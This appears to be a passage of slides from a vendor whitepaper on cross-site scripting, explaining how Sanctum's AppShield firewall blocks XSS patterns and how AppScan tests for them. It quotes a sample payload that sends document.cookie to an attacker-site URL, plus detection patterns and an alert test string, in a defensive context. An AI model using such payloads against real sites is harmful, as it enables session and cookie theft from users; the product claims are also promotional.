  • 26. How Sanctum’s AppShield protects against CSS attacks ● AppShield, Sanctum’s Web application firewall, is a secure proxy positioned in front of the web server, and protecting it, and all the code and data sitting behind it, from attack. AppShield inspects all incoming requests. Therefore, any CSS attack attempt will send the request (to welcome.cgi in the example) to AppShield, instead of directly to the web server. AppShield inspects the parameters of the request before forwarding it to the server. AppShield’s patented Dynamic Policy Recognition technology incorporates sophisticated pattern matching which blocks input potentially used for CSS attacks. For example, the patterns cover the following strings as referred to in this paper: <script>...</script> <body onload="javascript:..">
  • 27. How Sanctum’s AppShield protects against CSS attacks(Cont...) ● In the example, there is a parameter whose value contains the string <script>window.open(“http://www.attacker.site/collect.cgi?cookie= ”+document.cookie)</script> Upon spotting this illegal pattern, AppShield blocks the request and logs the attack attempt.
  • 28. How Sanctum’s AppScan scans for CSS vulnerabilities ● to mutate all "reasonable" parameters into various CSS attack variants. For example, it may try to inject the string <script>alert("CSS is possible")</script> into all parameters of all scripts. ● AppScan's uniquely comprehensive assembly of CSS attacks enables it to penetrate some applications that are resistant to simple CSS attacks. ● For each script it tries to attack, AppScan will inspect the results (the script response), and if the Javascript code is detected (that is, if the string returned as is - intact and in fullness: <script>alert("CSS is possible")</script>), it indicates that the attack succeeded (because the browser of the victim will execute the JS code). Moreover, the internal browser in AppScan will pop-up the Javascript alert window with the text "CSS is possible", which graphically demonstrates that the Javascript code was indeed executed.
  • 29. Conclusion Cross Site Scripting is one of the most common application level attacks that hackers use to sneak into web applications today, and one of the most dangerous. It is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unfortunately, this is often done without the knowledge of either the client or the organization being attacked. In order to prevent this malicious vulnerability, it is critical that an organization implement both an online and offline security strategy. This includes using an automated application vulnerability assessment tool, like AppScan from Sanctum, which can test for all the common web vulnerabilities, and application specific vulnerabilities (like cross site scripting) on a site. And for a full online defense, installing an application firewall, like AppShield from Sanctum, that can detect and defend against any type of manipulation to the code and content sitting on and behind the web servers.